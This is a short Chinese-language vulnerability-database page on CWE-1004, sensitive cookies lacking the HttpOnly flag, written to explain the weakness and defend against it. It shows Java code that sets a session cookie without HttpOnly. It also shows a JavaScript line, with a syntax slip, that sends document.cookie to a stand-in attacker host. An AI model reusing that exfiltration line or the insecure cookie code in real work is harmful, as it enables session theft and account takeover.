CWE-1004 没有’HttpOnly’标志的敏感Cookie 类弱点 28 条 CVE 漏洞汇总,含 AI 中文分析。
CWE-1004 属于敏感信息泄露类漏洞,指应用程序在存储敏感数据的 Cookie 中未设置 HttpOnly 标志。攻击者常利用跨站脚本(XSS)漏洞窃取该 Cookie,从而获取会话令牌或敏感凭证,进而接管用户账户。开发者应在生成 Cookie 时显式启用 HttpOnly 属性,禁止客户端脚本访问,并结合 Secure 和 SameSite 属性,以有效防止敏感数据被恶意脚本读取或滥用。
String sessionID = generateSessionId(); Cookie c = new Cookie("session_id", sessionID); response.addCookie(c);document.write('<img src="http://attacker.example.com/collect-cookies?cookie=' + document.cookie . '">'CWE-1004(没有’HttpOnly’标志的敏感Cookie) 是常见的弱点类别,本平台收录该类弱点关联的 28 条 CVE 漏洞。